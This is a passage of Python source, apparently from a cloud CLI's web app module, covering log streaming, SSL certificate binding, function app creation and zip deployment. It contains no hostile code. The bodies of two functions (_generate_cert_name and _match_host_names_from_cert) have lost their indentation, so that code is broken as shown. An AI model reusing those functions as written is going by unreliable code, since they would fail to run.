        configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
    return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
    """Show the app's CORS settings."""
    return get_site_configs(cmd, resource_group_name, name, slot).cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
    """Stream the app's live logs to stdout until interrupted with Ctrl+C."""
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    streaming_url = scm_url + '/logstream'
    if provider:
        streaming_url += ('/' + provider.lstrip('/'))
    user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    worker = threading.Thread(target=_get_log, args=(streaming_url, user, password))
    worker.daemon = True
    worker.start()
    # Park the main thread so that ctrl+c can stop the command.
    while True:
        time.sleep(100)
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
    """Download the app's historical logs (Kudu /dump) to a local file."""
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    _get_log(scm_url.rstrip('/') + '/dump', user_name, password, log_file)
    logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
    """Return (username, password) publishing credentials for an app."""
    poller = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
    creds = poller.result()
    return creds.publishing_user_name, creds.publishing_password
def _get_log(url, user_name, password, log_file=None):
    """Fetch logs from a Kudu endpoint using basic auth.

    When *log_file* is given, the response body is downloaded to that file;
    otherwise the response is streamed to stdout chunk by chunk (log tailing).
    Raises CLIError on any non-200 response.
    """
    import certifi
    import urllib3
    try:
        import urllib3.contrib.pyopenssl
        urllib3.contrib.pyopenssl.inject_into_urllib3()
    except ImportError:
        # pyOpenSSL is optional; fall back to the default SSL implementation.
        pass
    http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
    headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    # preload_content=False keeps the body unbuffered so it can be streamed.
    r = http.request(
        'GET',
        url,
        headers=headers,
        preload_content=False
    )
    if r.status != 200:
        raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
            url, r.status, r.reason))
    if log_file:  # download logs
        with open(log_file, 'wb') as f:
            while True:
                data = r.read(1024)
                if not data:
                    break
                f.write(data)
    else:  # streaming
        std_encoding = sys.stdout.encoding
        for chunk in r.stream():
            if chunk:
                # Extra encode()/decode() round-trip for stdouts that do not support 'utf-8'.
                print(chunk.decode(encoding='utf-8', errors='replace')
                      .encode(std_encoding, errors='replace')
                      .decode(std_encoding, errors='replace'), end='')  # each line of log has CRLF.
    r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file):
    """Upload a .pfx certificate and register it for the app's plan/location.

    :param certificate_password: password protecting the .pfx file.
    :param certificate_file: path to the .pfx file on disk.
    :return: the created/updated Certificate resource.
    """
    client = web_client_factory(cmd.cli_ctx)
    webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get')
    # Use a context manager so the pfx file handle is always closed
    # (the previous code opened it and never closed it).
    with open(certificate_file, 'rb') as cert_file:
        cert_contents = cert_file.read()
    hosting_environment_profile_param = (webapp.hosting_environment_profile.name
                                         if webapp.hosting_environment_profile else '')
    thumb_print = _get_cert(certificate_password, certificate_file)
    cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
                                    webapp.location, resource_group_name)
    cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
                       location=webapp.location, server_farm_id=webapp.server_farm_id)
    return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
    ''' Decrypts the .pfx file and returns the certificate's thumbprint. '''
    # Read via a context manager so the file handle is closed deterministically
    # (the previous code relied on garbage collection to close it).
    with open(certificate_file, 'rb') as f:
        p12 = OpenSSL.crypto.load_pkcs12(f.read(), certificate_password)
    cert = p12.get_certificate()
    digest_algorithm = 'sha1'
    # Thumbprint format used by the portal: hex SHA-1 digest without ':' separators.
    thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
    return thumbprint
def list_ssl_certs(cmd, resource_group_name):
    """List the SSL certificates in a resource group."""
    return web_client_factory(cmd.cli_ctx).certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
    """Delete the certificate whose thumbprint matches, or fail if none does."""
    client = web_client_factory(cmd.cli_ctx)
    matching = next((c for c in client.certificates.list_by_resource_group(resource_group_name)
                     if c.thumbprint == certificate_thumbprint), None)
    if matching is None:
        raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
    return client.certificates.delete(resource_group_name, matching.name)
def _update_host_name_ssl_state(cli_ctx, resource_group_name, webapp_name, location,
                                host_name, ssl_state, thumbprint, slot=None):
    """Set the SSL binding state of one host name via a partial Site update."""
    ssl_states = [HostNameSslState(name=host_name,
                                   ssl_state=ssl_state,
                                   thumbprint=thumbprint,
                                   to_update=True)]
    updated_webapp = Site(host_name_ssl_states=ssl_states, location=location)
    # Slot resources are addressed as 'app(slot)'.
    name = '{}({})'.format(webapp_name, slot) if slot else webapp_name
    return _generic_site_operation(cli_ctx, resource_group_name, name, 'create_or_update',
                                   slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
    """Apply *ssl_type* to every host name covered by the cert with the given thumbprint."""
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(name))
    # Certificates live in the plan's resource group, which may differ from the app's.
    cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
    for webapp_cert in client.certificates.list_by_resource_group(cert_resource_group_name):
        if webapp_cert.thumbprint != certificate_thumbprint:
            continue
        if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
            # Single non-wildcard host: bind it directly.
            return _update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp.location,
                                               webapp_cert.host_names[0], ssl_type,
                                               certificate_thumbprint, slot)
        # Wildcard or multi-host cert: bind every app host name the cert covers.
        query_result = list_hostnames(cmd, resource_group_name, name, slot)
        hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
        for host in _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp):
            _update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp.location,
                                        host, ssl_type, certificate_thumbprint, slot)
        return show_webapp(cmd, resource_group_name, name, slot)
    raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
    """Bind an uploaded certificate using SNI or IP-based SSL."""
    state = SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled
    return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, state, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
    """Remove the SSL binding of the certificate with the given thumbprint."""
    return _update_ssl_binding(cmd, resource_group_name, name,
                               certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper(object):
    """Lazily loads the available runtime stacks from ARM and resolves a
    display name (e.g. 'node|6.1') to the site-config / app-settings payload
    needed to activate it."""
    def __init__(self, client, linux=False):
        self._client = client
        self._linux = linux
        # Cached stack catalog; populated on first use by _load_stacks().
        self._stacks = []
    def resolve(self, display_name):
        """Return the stack dict whose displayName matches (case-insensitive), or None."""
        self._load_stacks()
        return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
                    None)
    @property
    def stacks(self):
        # Full catalog of known stacks (loaded on first access).
        self._load_stacks()
        return self._stacks
    @staticmethod
    def update_site_config(stack, site_config):
        """Apply the stack's settings as SiteConfig attributes (e.g. php_version)."""
        for k, v in stack['configs'].items():
            setattr(site_config, k, v)
        return site_config
    @staticmethod
    def update_site_appsettings(stack, site_config):
        """Apply the stack's settings as app settings (node is configured via the
        WEBSITE_NODE_DEFAULT_VERSION app setting rather than site config)."""
        if site_config.app_settings is None:
            site_config.app_settings = []
        site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
        return site_config
    def _load_stacks(self):
        """Fetch and cache the stack catalog for the selected OS.

        Linux entries carry only a 'displayName'; Windows entries additionally
        carry the 'configs' needed to activate the stack. Every entry gets a
        'setter' callable choosing between site-config and app-settings updates.
        """
        if self._stacks:
            return
        os_type = ('Linux' if self._linux else 'Windows')
        raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
        bytes_value = raw_stacks._get_next().content  # pylint: disable=protected-access
        json_value = bytes_value.decode('utf8')
        json_stacks = json.loads(json_value)
        stacks = json_stacks['value']
        result = []
        if self._linux:
            for properties in [(s['properties']) for s in stacks]:
                for major in properties['majorVersions']:
                    # Prefer the default minor version's runtime string when one exists.
                    default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
                                         None)
                    result.append({
                        'displayName': (default_minor['runtimeVersion']
                                        if default_minor else major['runtimeVersion'])
                    })
        else:  # Windows stacks
            config_mappings = {
                'node': 'WEBSITE_NODE_DEFAULT_VERSION',
                'python': 'python_version',
                'php': 'php_version',
                'aspnet': 'net_framework_version'
            }
            # get all stack version except 'java'
            for stack in stacks:
                if stack['name'] not in config_mappings:
                    continue
                name, properties = stack['name'], stack['properties']
                for major in properties['majorVersions']:
                    default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
                                         None)
                    result.append({
                        'displayName': name + '|' + major['displayVersion'],
                        'configs': {
                            config_mappings[name]: (default_minor['runtimeVersion']
                                                    if default_minor else major['runtimeVersion'])
                        }
                    })
            # deal with java, which pairs with java container version
            java_stack = next((s for s in stacks if s['name'] == 'java'))
            java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
            for java_version in java_stack['properties']['majorVersions']:
                for fx in java_container_stack['properties']['frameworks']:
                    for fx_version in fx['majorVersions']:
                        result.append({
                            'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
                                                                  fx['display'],
                                                                  fx_version['displayVersion']),
                            'configs': {
                                'java_version': java_version['runtimeVersion'],
                                'java_container': fx['name'],
                                'java_container_version': fx_version['runtimeVersion']
                            }
                        })
        for r in result:
            # node stacks apply via app settings; everything else via site config
            r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
                           r['displayName'] else _StackRuntimeHelper.update_site_config)
        self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
    """Return the instrumentation key of an Application Insights component."""
    appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
    component = appinsights_client.components.get(resource_group, name)
    if component is None or component.instrumentation_key is None:
        raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
    return component.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, sku,
                                        number_of_workers=None, location=None, tags=None):
    # This command merely shadows 'az appservice plan create' except with a few parameters
    return create_app_service_plan(cmd, resource_group_name, name,
                                   is_linux=None, hyper_v=None, sku=sku,
                                   number_of_workers=number_of_workers,
                                   location=location, tags=tags)
def is_plan_Elastic_Premium(plan_info):
    """True when *plan_info* is an AppServicePlan on the ElasticPremium tier."""
    return (isinstance(plan_info, AppServicePlan) and
            isinstance(plan_info.sku, SkuDescription) and
            plan_info.sku.tier == 'ElasticPremium')
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
                    os_type=None, runtime=None, consumption_plan_location=None,
                    app_insights=None, app_insights_key=None, deployment_source_url=None,
                    deployment_source_branch='master', deployment_local_git=None,
                    deployment_container_image_name=None, tags=None):
    """Create a function app on a consumption plan or an existing App Service plan.

    Exactly one of *plan* / *consumption_plan_location* must be given. Wires up
    the required storage app settings, the runtime, optional Application
    Insights, and the chosen deployment mechanism.
    """
    # pylint: disable=too-many-statements, too-many-branches
    if deployment_source_url and deployment_local_git:
        raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
    if bool(plan) == bool(consumption_plan_location):
        raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
    site_config = SiteConfig(app_settings=[])
    functionapp_def = Site(location=None, site_config=site_config, tags=tags)
    client = web_client_factory(cmd.cli_ctx)
    plan_info = None
    if consumption_plan_location:
        locations = list_consumption_locations(cmd)
        location = next((l for l in locations if l['name'].lower() == consumption_plan_location.lower()), None)
        if location is None:
            raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
        functionapp_def.location = consumption_plan_location
        functionapp_def.kind = 'functionapp'
        # if os_type is None, the os type is windows
        is_linux = os_type and os_type.lower() == 'linux'
        # for linux consumption plan app the os_type should be Linux & should have a runtime specified
        # currently in other cases the runtime is ignored
        if is_linux and not runtime:
            raise CLIError("usage error: --runtime RUNTIME required for linux functions apps with consumption plan.")
    else:  # apps with SKU based plan
        # The plan may be given as a full ARM id or as a name in this resource group.
        if is_valid_resource_id(plan):
            parse_result = parse_resource_id(plan)
            plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
        else:
            plan_info = client.app_service_plans.get(resource_group_name, plan)
        if not plan_info:
            raise CLIError("The plan '{}' doesn't exist".format(plan))
        location = plan_info.location
        # 'reserved' is the ARM flag marking a Linux plan.
        is_linux = plan_info.reserved
        functionapp_def.server_farm_id = plan
        functionapp_def.location = location
    if runtime:
        if is_linux and runtime not in LINUX_RUNTIMES:
            raise CLIError("usage error: Currently supported runtimes (--runtime) in linux function apps are: {}."
                           .format(', '.join(LINUX_RUNTIMES)))
        elif not is_linux and runtime not in WINDOWS_RUNTIMES:
            raise CLIError("usage error: Currently supported runtimes (--runtime) in windows function apps are: {}."
                           .format(', '.join(WINDOWS_RUNTIMES)))
        site_config.app_settings.append(NameValuePair(name='FUNCTIONS_WORKER_RUNTIME', value=runtime))
    con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
    if is_linux:
        functionapp_def.kind = 'functionapp,linux'
        functionapp_def.reserved = True
        if consumption_plan_location:
            site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
        else:
            # Dedicated Linux plan: runtime v2 beta plus a generated decryption key.
            site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='beta'))
            site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
                                                          value=str(hexlify(urandom(32)).decode()).upper()))
            if deployment_container_image_name:
                # Custom container image: run read-only from the image, no shared storage.
                functionapp_def.kind = 'functionapp,linux,container'
                site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
                                                              value=deployment_container_image_name))
                site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
                site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
                                                              value='false'))
                site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
            else:
                # Default Linux runtime image.
                site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
                                                              value='true'))
                site_config.linux_fx_version = _format_fx_version('appsvc/azure-functions-runtime')
    else:
        functionapp_def.kind = 'functionapp'
        site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
    # adding appsetting to site to make it a function
    site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
    site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
    site_config.app_settings.append(NameValuePair(name='WEBSITE_NODE_DEFAULT_VERSION', value='8.11.1'))
    if consumption_plan_location is None and not is_plan_Elastic_Premium(plan_info):
        # Dedicated plans keep the host warm; consumption/elastic plans instead
        # need the content-share settings below.
        site_config.always_on = True
    else:
        site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
                                                      value=con_string))
        site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
    if app_insights_key is not None:
        site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
                                                      value=app_insights_key))
    elif app_insights is not None:
        instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
        site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
                                                      value=instrumentation_key))
    poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
    functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
    if consumption_plan_location and is_linux:
        logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully"
                       "created but is not active until content is published using"
                       "Azure Portal or the Functions Core Tools.", name)
    else:
        _set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
                                 deployment_source_branch, deployment_local_git)
    return functionapp
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
                             deployment_source_branch='master', deployment_local_git=None):
    """Wire up source control: an external git URL and/or a local-git endpoint."""
    if deployment_source_url:
        logger.warning("Linking to git repository '%s'", deployment_source_url)
        try:
            config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
                                  deployment_source_branch, manual_integration=True)
        except Exception as ex:  # pylint: disable=broad-except
            # Best effort: report the failure but do not abort app creation.
            ex = ex_handler_factory(no_throw=True)(ex)
            logger.warning("Link to git repository failed due to error '%s'", ex)
    if deployment_local_git:
        local_git_info = enable_local_git(cmd, resource_group_name, name)
        git_url = local_git_info['url']
        logger.warning("Local git is configured with url of '%s'", git_url)
        setattr(webapp, 'deploymentLocalGitUrl', git_url)
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
    """Validate a storage account and build its connection string.

    *storage_account* may be a plain account name (assumed to live in
    *resource_group_name*) or a full ARM resource id.
    :raises CLIError: when a required endpoint is missing or the SKU is unsupported.
    """
    sa_resource_group = resource_group_name
    if is_valid_resource_id(storage_account):
        sa_resource_group = parse_resource_id(storage_account)['resource_group']
        storage_account = parse_resource_id(storage_account)['name']
    storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
    storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
                                                                        storage_account)
    error_message = ''
    endpoints = storage_properties.primary_endpoints
    sku = storage_properties.sku.name.value
    allowed_storage_types = ['Standard_GRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
    # Functions requires blob, queue and table endpoints (rules out blob-only accounts).
    for e in ['blob', 'queue', 'table']:
        if not getattr(endpoints, e, None):
            error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e)   # pylint: disable=line-too-long
    if sku not in allowed_storage_types:
        error_message += 'Storage type {} is not allowed'.format(sku)
    if error_message:
        raise CLIError(error_message)
    obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account)  # pylint: disable=no-member
    try:
        keys = [obj.keys[0].value, obj.keys[1].value]  # pylint: disable=no-member
    except AttributeError:
        # Older API versions have a slightly different structure
        keys = [obj.key1, obj.key2]  # pylint: disable=no-member
    endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
    connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
        "https",
        endpoint_suffix,
        storage_account,
        keys[0])  # pylint: disable=no-member
    return connection_string
def list_consumption_locations(cmd):
    """List region names that support consumption (Dynamic SKU) function apps."""
    regions = web_client_factory(cmd.cli_ctx).list_geo_regions(sku='Dynamic')
    return [{'name': region.name.lower().replace(' ', '')} for region in regions]


def list_locations(cmd, sku, linux_workers_enabled=None):
    """List regions available for the given app service plan SKU."""
    full_sku = get_sku_name(sku)
    return web_client_factory(cmd.cli_ctx).list_geo_regions(full_sku, linux_workers_enabled)
def _check_zip_deployment_status(deployment_status_url, authorization, timeout=None):
    """
    Poll the Kudu deployment status endpoint every 2 seconds until the zip
    deployment finishes.

    :param deployment_status_url: Kudu status URL to poll.
    :param authorization: headers dict carrying the basic-auth credential.
    :param timeout: optional overall timeout in seconds (default ~900s).
    :return: the final status dict from Kudu.
    :raises CLIError: on deployment failure (status 3) or timeout.
    """
    import requests
    total_trials = (int(timeout) // 2) if timeout else 450
    # BUG FIX: start with an empty dict so a zero-trial timeout can't hit an
    # unbound res_dict below.
    res_dict = {}
    for _ in range(total_trials):
        time.sleep(2)
        response = requests.get(deployment_status_url, headers=authorization)
        res_dict = response.json()
        status = res_dict.get('status', 0)
        if status == 3:
            raise CLIError("Zip deployment failed.")
        if status == 4:
            break
        if 'progress' in res_dict:
            logger.info(res_dict['progress'])  # show only in debug mode, customers seem to find this confusing
    # if the deployment is taking longer than expected
    if res_dict.get('status', 0) != 4:
        # BUG FIX: "beforing launching" -> "before launching" in the user-facing message
        raise CLIError("""Deployment is taking longer than expected. Please verify
                          status at '{}' before launching the app""".format(deployment_status_url))
    return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
    """List the continuous webjobs of a web app (or of one of its slots)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)


def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Start a continuous webjob and return its refreshed representation."""
    client = web_client_factory(cmd.cli_ctx)
    if not slot:
        client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
        return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
    client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name, slot)
    return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)


def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Stop a continuous webjob and return its refreshed representation."""
    client = web_client_factory(cmd.cli_ctx)
    if not slot:
        client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
        return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
    client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name, slot)
    return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)


def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Delete a continuous webjob from a web app (or slot)."""
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name, slot)
    return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
    """List the triggered webjobs of a web app (or of one of its slots)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)


def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Run a triggered webjob once and return its refreshed representation."""
    client = web_client_factory(cmd.cli_ctx)
    if not slot:
        client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
        return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
    client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
    return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)


def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Delete a triggered webjob from a web app (or slot)."""
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name, slot)
    return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)


def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Return the run history of a triggered webjob."""
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
    return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def create_deploy_webapp(cmd, name, location=None, sku=None, dryrun=False):  # pylint: disable=too-many-statements
    """
    One-shot "create everything and deploy" command: detect the runtime from the
    current directory, create (as needed) a resource group, app service plan and
    web app, then zip-deploy the directory contents.

    :param name: name of the web app to create or reuse.
    :param location: Azure region; derived from SKU availability when omitted.
    :param sku: app service plan SKU; defaults per detected runtime (F1 when
        no supported runtime is detected).
    :param dryrun: when True, only return the computed configuration as a dict.
    :return: dict describing the configuration (and ``app_url`` after deploy).
    """
    import os
    client = web_client_factory(cmd.cli_ctx)
    # the code to deploy is expected to be the current directory the command is running from
    src_dir = os.getcwd()
    # if dir is empty, show a message in dry run
    do_deployment = bool(os.listdir(src_dir))
    _create_new_rg = True
    _create_new_asp = True
    _create_new_app = True
    _set_build_appSetting = False
    # defensive default: only meaningful when a language is detected, but it is
    # read later regardless of the branch taken below
    is_skip_build = False
    # determine the details for app to be created from src contents
    lang_details = get_lang_from_content(src_dir)
    # we support E2E create and deploy for selected stacks, any other stack, set defaults for os & runtime
    # and skip deployment
    if lang_details['language'] is None:
        do_deployment = False
        # BUG FIX: was `sku = sku | 'F1'` which raises TypeError (bitwise-or on
        # str/None); the intent is a default value.
        sku = sku or 'F1'
        os_val = OS_DEFAULT
        detected_version = '-'
        runtime_version = '-'
    else:
        # use the runtime's default SKU only when the user didn't set one
        if sku is None:
            sku = lang_details.get("default_sku")
        language = lang_details.get("language")
        is_skip_build = language.lower() == STATIC_RUNTIME_NAME
        os_val = "Linux" if language.lower() == NODE_RUNTIME_NAME \
            or language.lower() == PYTHON_RUNTIME_NAME else OS_DEFAULT
        # detect the version
        data = get_runtime_version_details(lang_details.get('file_loc'), language)
        version_used_create = data.get('to_create')
        detected_version = data.get('detected')
        runtime_version = "{}|{}".format(language, version_used_create) if \
            version_used_create != "-" else version_used_create
    full_sku = get_sku_name(sku)
    location = set_location(cmd, sku, location)
    loc_name = location.replace(" ", "").lower()
    is_linux = os_val == 'Linux'
    asp = "appsvc_asp_{}_{}".format(os_val, loc_name)
    rg_name = "appsvc_rg_{}_{}".format(os_val, loc_name)
    # Resource group: check if default RG is set
    default_rg = cmd.cli_ctx.config.get('defaults', 'group', fallback=None)
    _create_new_rg = should_create_new_rg(cmd, default_rg, rg_name, is_linux)
    src_path = "{}".format(src_dir.replace("\\", "\\\\"))
    rg_str = "{}".format(rg_name)
    dry_run_str = r""" {
            "name" : "%s",
            "serverfarm" : "%s",
            "resourcegroup" : "%s",
            "sku": "%s",
            "os": "%s",
            "location" : "%s",
            "src_path" : "%s",
            "version_detected": "%s",
            "version_to_create": "%s"
            }
            """ % (name, asp, rg_str, full_sku, os_val, location, src_path,
                   detected_version, runtime_version)
    create_json = json.loads(dry_run_str)
    if dryrun:
        logger.warning("Web app will be created with the below configuration,re-run command "
                       "without the --dryrun flag to create & deploy a new app")
        return create_json
    # create RG if the RG doesn't already exist
    if _create_new_rg:
        logger.warning("Creating Resource group '%s' ...", rg_name)
        create_resource_group(cmd, rg_name, location)
        logger.warning("Resource group creation complete")
        _create_new_asp = True
    else:
        logger.warning("Resource group '%s' already exists.", rg_name)
        _create_new_asp = should_create_new_asp(cmd, rg_name, asp, location)
    # create new ASP if an existing one cannot be used
    if _create_new_asp:
        logger.warning("Creating App service plan '%s' ...", asp)
        sku_def = SkuDescription(tier=full_sku, name=sku, capacity=(1 if is_linux else None))
        plan_def = AppServicePlan(location=loc_name, app_service_plan_name=asp,
                                  sku=sku_def, reserved=(is_linux or None))
        client.app_service_plans.create_or_update(rg_name, asp, plan_def)
        logger.warning("App service plan creation complete")
        _create_new_app = True
    else:
        logger.warning("App service plan '%s' already exists.", asp)
        _create_new_app = should_create_new_app(cmd, rg_name, name)
    # create the app
    if _create_new_app:
        logger.warning("Creating app '%s' ....", name)
        create_webapp(cmd, rg_name, name, asp, runtime_version if is_linux else None)
        logger.warning("Webapp creation complete")
        _set_build_appSetting = True
    else:
        logger.warning("App '%s' already exists", name)
        if do_deployment and not is_skip_build:
            # setting the appsettings causes a app restart so we avoid if not needed
            _app_settings = get_app_settings(cmd, rg_name, name)
            if all(not d for d in _app_settings):
                _set_build_appSetting = True
            elif '"name": "SCM_DO_BUILD_DURING_DEPLOYMENT", "value": "true"' not in json.dumps(_app_settings[0]):
                _set_build_appSetting = True
            else:
                _set_build_appSetting = False
    # update create_json to include the app_url
    url = _get_url(cmd, rg_name, name)
    if _set_build_appSetting:
        # setting to build after deployment
        logger.warning("Updating app settings to enable build after deployment")
        update_app_settings(cmd, rg_name, name, ["SCM_DO_BUILD_DURING_DEPLOYMENT=true"])
    if do_deployment:
        logger.warning("Creating zip with contents of dir %s ...", src_dir)
        # zip contents & deploy
        zip_file_path = zip_contents_from_dir(src_dir, language)
        logger.warning("Preparing to deploy %s contents to app."
                       "This operation can take a while to complete ...",
                       '' if is_skip_build else 'and build')
        enable_zip_deploy(cmd, rg_name, name, zip_file_path)
        # Remove the file afer deployment, handling exception if user removed the file manually
        try:
            os.remove(zip_file_path)
        except OSError:
            pass
    create_json.update({'app_url': url})
    logger.warning("All done.")
    return create_json
def _ping_scm_site(cmd, resource_group, name):
    """Wake up the Kudu (SCM) site by issuing an authenticated GET against it."""
    import requests
    import urllib3
    # work around until the timeout limits issue for linux is investigated & fixed
    user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
